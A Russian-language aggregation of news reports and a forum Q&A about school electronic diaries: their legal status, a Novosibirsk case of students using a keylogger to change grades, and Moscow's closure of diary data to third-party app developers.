жителей не было потрачены впустую», — заключает он.

  • Короткая ссылка
  • Распечатать

Источник: https://cnews.ru/news/top/2017-08-08_moskva_zapretila_storonnim_razrabotchikam_sozdavat

Электронный дневник обязателен?! — вопрос №13109724 от 02.09.2017

Существует распоряжение правительства от 27 февраля 2010 г. N 246-р О плане первоочередных действий по модернизации общего образования на 2010 г.

, согласно которому даются обязательства Минобрнауки России обеспечить координацию и контроль вышеуказанных планов правительства о модернизации школьного документооборота. В природе отсутствую законы обязывающие учеников вести электронные дневники.

Еще раз обращаю ваше внимание, что это для упрощения документа-оборота образовательного учреждения.

Вот комментарий министра образования Пензенской области:

министр образования Пензенской области С.К.Копешкина:

— В век информационных технологий неизбежен переход на «Электронное правительство», электронный документооборот, в том числе и электронные дневники и журналы.

На заседании президиума Госсовета, на котором рассматривался вопрос о реализации Стратегии развития информационного общества в РФ президент России Д.А.

Медведев предложил школьный журнал и дневник школьника сделать электронными.

«Давайте вот как сделаем: бумажную форму журнала и дневника убирать не будем, а вменим в обязанности школ параллельно ввести эти электронные документы. Во всяком случае, журнал точно можно ввести» — сказал Медведев.

Внедрение электронных дневников в школах и других образовательных учреждениях планируется сделать обязательными и ввести до начала 2012-2013 учебного года. Если у родителей нет средств на оплату электросвязи и нет компьютера, то они могут контролировать успеваемость своих детей на бумажном носителе.

Что касается разглашения персональных данных школьников, то в соответствии с ч.4 ст.9 ФЗ от 27.07.2006 г №152-ФЗ «О персональных данных» в случаях, предусмотренных ФЗ, обработка персональных данных осуществляется только с согласия в письменной форме субъекта персональных данных.

Равнозначным содержащему собственноручную подпись субъекта персональных данных согласию в письменной форме на бумажном носителе признаётся согласие в форме электронного документа, подписанного в соответствии с ФЗ электронной подписью.

Содержание и объём обрабатываемых персональных данных должны соответствовать заявленным целям обработки. Обрабатываемые персональные данные не должны быть избыточными по отношению к заявленным целям их обработки. В соответствии с ч.1 ст.9 ФЗ 27.07.

2006 г №152-ФЗ «О персональных данных» субъект персональных данных принимает решение о предоставлении его персональных данных и даёт согласие на их обработку свободно, своей волей и в своём интересе.

Таким образом, в соответствии с действующим законодательством, заставить субъекта персональных данных дать своё согласие на обработку его персональных данных с целью ведения его электронного дневника не представляется возможным, а значит, использования электронного дневника учащегося является ДЕЛОМ ДОБРОВОЛЬНЫМ.

Из газеты «Городищенский вестник» 7 декабря 2011 № 97 (9641)

Так же даю ссылку на письмо МИНИСТЕРСТВО ОБРАЗОВАНИЯ И НАУКИ РОССИЙСКОЙ ФЕДЕРАЦИИ ПИСЬМО от 15 февраля 2012 г. № АП-147/07. Если что то не понятно, пишите, разъясню. Удачи.

Запомните одну важную вещь, законы могут быть любой абсурдности, любые законы преследуют цель благополучия и процветания гражданского общества и граждан и если кто то принуждает к исполнению закона, который нарушает права граждан или ухудшает положение гражданина в финансовом или моральном плане, то исполнение этого закона противоречит нормам морали. А организация принуждающая к исполнению этого закона совершает противоправные действия и нарушает закон о правах граждан. Пишите. Еще раз удачи.

Источник: https://www.9111.ru/questions/13109724/

Школьникам из Новосибирска грозит тюремный срок за взлом электронного журнала. Новости. Первый канал

Два года тюрьмы за исправление двоек в электронном журнале грозит жителю Новосибирска.

В школе по углубленному изучению информатики один из старшеклассников взломал программу, а другой воспользовался доступом к системе и менял себе и одноклассникам плохие оценки на хорошие. Обман раскрылся, учителя обратились в полицию.

Расследование длилось год, и теперь дело передано в суд. Молодые люди и не догадывались, насколько суровым может быть наказание за такой поступок.

Гимназия с углубленным изучением информатики попала под атаку хакеров – своих же учеников. Изобретательный старшеклассник создал программу, с помощью которой заполучил логины и пароли «администраторов». Так в системе «Электронного журнала» называют преподавателей.

«Мальчик – компьютерный гений, который разработал программку и установил ее на несколько компьютеров в школе. Эта программа считывала с клавиатуры всю информацию, которая вводилась», – рассказала Елена Вашкевич, учитель русского языка и литературы, администратор электронного дневника.

Своей разработкой ученик не воспользовался, а передал ее другому школьнику, который стер на ресурсе плохие оценки себе и другим одноклассникам. Резкое повышение успеваемости класса учителя заметили лишь через месяц. Электронные и «настоящие», зафиксированные в учительском блокноте оценки не совпадали.

«Учитель открыл этот отчет, он увидел, что здесь, например, стоит предмет математика. Первое изменение внесла она, а следующее изменение уже внесла администратор, которая, по идее, не должна была этого сделать», – рассказывает Елена Вашкевич.

Сначала в гимназии хакера искали самостоятельно. Обратили внимание на школьника, у которого было больше всего исправленных оценок. Старшеклассник признал вину, а заодно рассказал про друга, который достал логин и пароль для доступа.

«Преподаватели гимназии заметили внесение в электронный журнал изменения и сообщили об этом в полицию. После проведения проверки уголовное дело с обвинительным заключением, утвержденным прокурором, направлено в суд», — сообщила Юлия Скибр, следователь информационно-аналитического отдела Главного следственного управления ГУ МВД России по НСО.

Если вина хакера будет доказана, молодому человеку грозит наказание до двух лет лишения свободы по статье «Неправомерный доступ к компьютерной информации». В отношении второго, уже бывшего ученика проводится проверка. Хотя психологи говорят — так подростки завоевывают внимание одноклассников.

«Это может быть своего рода бонусом в выстраивании отношений с ними. Я вам отметки — вы мне, как минимум, уважение, за то, что я умею делать», — объясняет педагог-психолог Анна Бердникова.

Электронный дневник – государственный онлайн-ресурс, подростки могли получить доступ к персональным данным учителей и учеников. Взлом школьной компьютерной системы – серьезное преступление. Многие школьники просто не понимают, какую ответственность понесут.

Если раньше скрыть оценки от родителей в обычном дневнике удавалось с легкостью – школьники просто теряли этот дневник, вырывали из него страницы, исправляли оценки с помощью лезвия, то электронный аналог дневника доступен 24 часа в сутки с компьютера, планшета или мобильного телефона. Родители сегодня могут узнать, что получило их чадо, не спрашивая об этом ребенка, а посещаемость контролируют с помощью смс.

Сегодня в интернете множество видеороликов, где школьники объясняют, как взломать систему онлайн-журнала. Несколько исправлений в компьютерном коде и заветное «отлично» стоит в дневнике ученика. А еще есть вирусные программы. Все в открытом доступе и за небольшую сумму,.

«Школьники воспользовались тем, что учителя не исполняли дословно инструкцию по информационной безопасности. С каких компьютеров заходить, какой длины должен быть пароль? При соблюдении этих инструкций та ситуация, которая сложилась, она не смогла бы реализоваться», — уверен директор проектов и программ в сфере образования Руслан Пермяков.

Следствие длится почти год. За это время ребята успели закончить школу. Сейчас они учатся на факультете информационных технологий в одном из новосибирских вузов.

Источник: https://www.1tv.ru/n/335598

Разработчикам электронных дневников закрыли доступ к данным школьников, якобы чтобы спасти тех от порнографии

Департамент информационных технологий правительства Москвы закрыл электронные дневники школьников от разработчиков мобильных приложений, сообщил в своем блоге на сайте «Эха Москвы» глава ДИТ Артем Ермолаев.

В связи со случаями нарушения этических норм сторонними разработчиками мобильных приложений электронного дневника, а также для обеспечения максимального уровня информационной безопасности ребенка, мы приняли решения существенно усилить авторизацию при входе родителя и ребенка в сервис «электронный дневник». Поэтому с 1 сентября воспользоваться сервисом дневника можно будет только через авторизацию на официальном сайте Мэра Москвы mos.ru.

В разгар прошлого учебного года, в одном их самых массовых неофициальных мобильных приложений дневника, были размещены материалы порнографического характера. Это происшествие создало серьезный резонанс среди родителей.

На ДИТ массово были поданы жалобы, в отдельных случаях — судебные иски По этой причине принято решение о закрытии доступа к данным дневника для неофициальных ресурсов — не только для вышеупомянутого разработчика, а для всех. Мы переводим дневник на бесплатный для жителей ресурс mos.ru и также у нас есть официальное бесплатное приложение дневника.

Бесплатность — это тоже важно! Потому что мы защищаем людей в принципе от любой рекламы внутри сервиса, а тем более неэтичной, — пишет чиновник.

Ранее создатель самого массового стороннего приложения для работы с электронными дневниками «МРКО — независимый дневник» Леван Квирквелия рассказал на сайте Habrahabr, что ему закрыли доступ к данным школьников из-за конкуренции с другим сервисом — Kid Radar, который разработала компания «Тактик Лабс». «Тактик Лабс» связана с компанией «Альтарикс», которая разработала большую часть электронных приложений для московского правительства, уверен он.

Эти компании («Тактик Лабс» и «Альтарикс» — «Роем!») тесно связаны. Цель их приложения — заработать на том, что они же и не создали адекватного официального конкурента, — пишет Леван Квирквелия.

По данным Kartoteka.ru, «Тактик Лабс» принадлежит «ФЕЙРГЛАЙД», ее генеральный директор также возглавлял компанию «Техстройторг», все юрлица зарегистрированы в Москве.

«Альтарикс» зарегистрирована в Самаре, на 100% принадлежит гендиректору Денису Николаеву.

Судя по тому, что Ермолаев специально упомянул о бесплатности сервиса, теперь доступ отключат всем разработчикам приложений — и у Квирквелии, и у «Тактик Лабс» были дополнительные платные функции в их решениях.

Источник: https://roem.ru/08-08-2017/256575/dnevnik-dit/

Ссылка на основную публикацию